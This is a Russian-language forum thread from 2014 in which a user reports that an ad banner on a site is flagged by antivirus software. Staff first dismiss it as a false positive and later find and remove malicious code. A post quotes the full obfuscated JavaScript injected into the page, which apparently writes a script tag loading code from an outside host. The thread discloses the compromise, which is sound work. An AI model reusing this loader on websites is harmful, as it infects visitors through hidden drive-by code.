«БЕЗОПАСНЫЕ» НОВОСТИ - Страница 27

Eldar Ishimbaev · 31.01.2014 13:10

Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.

Иванов Михаил · 31.01.2014 18:08

Цитата:

Сообщение от Eldar Ishimbaev

Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.

Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером ?

Цитата:

![]+"")[$_],__$:++$_,$_$_

![]+"")[$_],_$_:++$_,$_$$

{}+"")[$_],$$_$

$_[$_]+"")[$_],_$$:++$_,$$$_

!""+"")[$_],$__:++$_,$_$:++$_,$$__

{}+"")[$_],$$_:++$_,$$$:++$_,$___:++$_,$__$:++$_};$_.$_=($_. $_=$_+"")[$_.$_$]+($_._$=$_.$_[$_.__$])+($_.$$=($_.$+"")[$_.__$])+((!$_)+"")[$_._$$]+($_.__=$_.$_[$_.$$_])+($_.$=(!""+"")[$_.__$])+($_._=(!""+"")[$_._$_])+$_.$_[$_.$_$]+$_.__+$_._$+$_.$;$_.$$=$_.$+(!""+"")[$_._$$]+$_.__+$_._+$_.$+$_.$$;$_.$=($_.___)[$_.$_][$_.$_];$_.$($_.$($_.$$+"\""+$_.$$_$+"="+$_.$$_$+$_._$+$_ .$$__+$_._+"\\"+$_.__$+$_.$_$+$_.$_$+$_.$$$_+"\\"+ $_.__$+$_.$_$+$_.$$_+$_.__+";"+$_._+$_.$_$_+"=\\"+ $_.__$+$_.$_$+$_.$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_ .$$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$__+ $_.$$$+$_.$_$_+$_.__+$_._$+"\\"+$_.__$+$_.$$_+$_._ $_+"."+$_._+"\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+"\\" +$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_.___+$_.__$+"\ \"+$_.__$+$_.$__+$_.$$$+$_.$$$_+"\\"+$_.__$+$_.$_$ +$_.$$_+$_.__+";\\"+$_.__$+$_.$_$+$_.__$+$_.$$$$+" ("+$_.$$_$+"._\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$ +$_.$$$+$_.___+"==="+$_._+"\\"+$_.__$+$_.$_$+$_.$$ _+$_.$$_$+$_.$$$_+$_.$$$$+"\\"+$_.__$+$_.$_$+$_.__ $+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$_+$_.$$_$+"\\"+$ _.$__+$_.___+"&&\\"+$_.$__+$_.___+$_.$$_$+"."+$_.$ $__+$_._$+$_._$+"\\"+$_.__$+$_.$_$+$_._$$+"\\"+$_. __$+$_.$_$+$_.__$+$_.$$$_+".\\"+$_.__$+$_.$$_+$_._ $$+$_.$$$_+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$ __+"\\"+$_.__$+$_.$_$+$_.___+"('_"+$_._+$_.__+"\\" +$_.__$+$_.$_$+$_.$_$+$_._+$_.$$_$+"=')==-"+$_.__$+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_.___+$ _._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$_+$_. $_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$_.__$ +$_.$_$+$_.___+"('\\"+$_.__$+$_._$_+$_.$$$+"\\"+$_ .__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$ _$+$_._$+"\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$+$_. $$_+$_._$$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+$ _.$$_+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.$__+$_.___ +"')>"+$_.___+"\\"+$_.$__+$_.___+"&&\\"+$_.$__+$_. ___+$_._+$_.$_$_+".\\"+$_.__$+$_.$$_+$_._$$+$_.$$$ _+$_.$_$_+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"\\"+$ _.__$+$_.$_$+$_.___+"('\\"+$_.__$+$_.__$+$_.$_$+"\ \"+$_.__$+$_._$_+$_._$$+"\\"+$_.__$+$_.__$+$_.__$+ "\\"+$_.__$+$_.___+$_.$_$+"\\"+$_.$__+$_.___+"')>" +$_.___+")\\"+$_.$__+$_.___+"{"+$_.$$_$+"._\\"+$_. __$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$$$+$_.___+"="+$_ .__$+";"+$_.$$_$+"."+$_.$$__+$_._$+$_._$+"\\"+$_._ _$+$_.$_$+$_._$$+"\\"+$_.__$+$_.$_$+$_.__$+$_.$$$_ +"='__"+$_._+$_.__+"\\"+$_.__$+$_.$_$+$_.$_$+$_._+ $_.$$_$+"="+$_.__$+";\\"+$_.$__+$_.___+$_.$$$_+"\\ "+$_.__$+$_.$$$+$_.___+"\\"+$_.__$+$_.$$_+$_.___+" \\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_._$_ +$_.$$$_+"\\"+$_.__$+$_.$$_+$_._$$+"=\\"+$_.__$+$_ ._$_+$_.$$$+$_.$$$_+$_.$$_$+",\\"+$_.$__+$_.___+$_ .___+$_.__$+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.__$+ $_._$_+$_.$_$_+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.$ __+$_.___+$_._$_+$_.___+$_._$_+$_.___+"\\"+$_.$__+ $_.___+$_.___+$_.___+":"+$_.___+$_.___+":"+$_.___+ $_.___+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_._$_+$_.$_ $+"\\"+$_.__$+$_._$_+$_.$__+"\\"+$_.__$+$_.___+$_. _$$+";\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_.___+ $_.$_$_+$_.__+"\\"+$_.__$+$_.$_$+$_.___+"=/';"+$_.$$_$+".\\"+$_.__$+$_.$$_+$_.$$$+"\\"+$_.__$ +$_.$$_+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+$_.__+$_. $$$_+(![]+"")[$_._$_]+"\\"+$_.__$+$_.$_$+$_.$$_+"(\\\"<\\"+$_.__$+$_.$$ _+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$_+$_._$_+"\\\"+\ \\"\\"+$_.__$+$_.$_$+$_.__$+"\\"+$_.__$+$_.$$_+$_. ___+$_.__+"\\"+$_.$__+$_.___+"\\"+$_.__$+$_.$$_+$_ ._$$+"\\"+$_.__$+$_.$$_+$_._$_+$_.$$__+"='\\"+$_._ _$+$_.$_$+$_.___+$_.__+$_.__+"\\"+$_.__$+$_.$$_+$_ .___+"://"+$_.$_$$+"\\"+$_.__$+$_.$$_+$_._$_+"\\"+$_.__$+$_ .$_$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+"\\"+$_.__$+ $_.$$_+$_._$$+"."+$_.$_$$+"\\"+$_.__$+$_.$_$+$_.__ $+"\\"+$_.__$+$_.$$$+$_._$_+"/"+$_.$_$+$_.$_$$+$_.$_$$+$_.$_$$+$_.___+$_.$$$_+$_ ._$_+$_.__$+".\\"+$_.__$+$_.$_$+$_._$_+"\\"+$_.__$ +$_.$$_+$_._$$+"?"+$_.$$__+"\\"+$_.__$+$_.$$_+$_._ __+"="+$_.$_$_+$_.$$_$+"\\"+$_.__$+$_.$$_+$_.$$_+" ."+$_._+"\\"+$_.__$+$_.$$$+$_._$_+"\\"+$_.__$+$_.$ _$+$_.__$+"\\"+$_.__$+$_.$_$+$_.$$_+$_.$$$$+$_._$+ $_.$$__+$_._$+"\\"+$_.__$+$_.$_$+$_.$_$+"."+$_._+" \\"+$_.__$+$_.$$$+$_._$_+"'></\\"+$_.__$+$_.$$_+$_._$$+$_.$$__+"\\"+$_.__$+$_.$$ _+$_._$_+"\\"+$_.__$+$_.$_$+$_.__$+"\\\"+\\\"\\"+$ _.__$+$_.$$_+$_.___+$_.__+">\\\");}"+"\"")())();}c atch(e){}</script>

Котофей · 31.01.2014 18:53

Цитата:

Сообщение от Иванов Михаил

с регулярными выражениями

Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/

Иванов Михаил · 31.01.2014 19:10

Цитата:

Сообщение от Котофей

Цитата:

Сообщение от Иванов Михаил

с регулярными выражениями

Это не регулярки, это обфускация
http://habrahabr.ru/post/112530/

Я на столько не разбираюсь в js/ А как его декомпилировать или расшифровать? Возможно это и не "вирус", но часто именно к скрытию кода прибегают создатели вирусов.
UPD вот похожий код http://www.linux.org.ru/forum/web-development/5547798

Ramil Ziganshin · 31.01.2014 19:28

Цитата:

Сообщение от Иванов Михаил

Цитата:

Сообщение от Eldar Ishimbaev

Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.

Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером ?

Ведем анализ. По результатам отпишемся.

Иванов Михаил · 31.01.2014 19:50

Цитата:

Сообщение от Eldar Ishimbaev

Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.

Цитата:

Сообщение от Ramil Ziganshin

Ведем анализ. По результатам отпишемся.

Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало заражение на своем сайте. А "заражение" присутствовало.

Ramil Ziganshin · 31.01.2014 20:22

Цитата:

Сообщение от Иванов Михаил

Цитата:

Сообщение от Eldar Ishimbaev

Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.

Цитата:

Сообщение от Ramil Ziganshin

Ведем анализ. По результатам отпишемся.

Возможно пока вы ведете анализ следует отключить рекламную сеть http://adv.uzinfocom.uz/ ?
Вдруг вы ошибаетесь и это не ложное срабатывание?
Я помню как uza.uz не признавало заражение на своем сайте. А "заражение" присутствовало.

Нашли вредоносный код. Удалили.

Ramil Ziganshin · 31.01.2014 20:26

Цитата:

Сообщение от Иванов Михаил

Цитата:

Сообщение от Eldar Ishimbaev

Иванов Михаил, это ЛОЖНОЕ СРАБАТЫВАНИЕ только антивируса Avast. Ничего не инфицировано. Я уже лично отписал в техподдержку Avast.

Если нет ни чего вредоносного, тогда что это за js с регулярными выражениями на странице с баннером ?

Спасибо за сообщение. Проведем ревизию, усилим защиту.

ratheon · 31.01.2014 21:29

Цитата:

Сообщение от Ramil Ziganshin

Спасибо за сообщение. Проведем ревизию, усилим защиту.

о реакции антивирусов на ваши рекламные баннеры уже писали полтора месяц назад, видимо "доходит" не с первого раза

Anvar Atakhanov · 31.01.2014 21:37

Полцарства тому кто устранить эту проблему:

Задолбал уже

Опции темы
Версия для печати Отправить по электронной почте
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

Знаете ли Вы, что ...
	...до того как открыть новую тему, стоит использовать поиск: такая тема уже может существовать.
	<< Предыдущий совет - Случайный совет - Следующий совет >>

Реклама и уведомления
<a href='http://adv.uzinfocom.uz/www/delivery/ck.php?n=a528de92&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://adv.uzinfocom.uz/www/delivery/avw.php?zoneid=65&cb=INSERT_RANDOM_NUMBER_HERE&n=a528de92&ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a>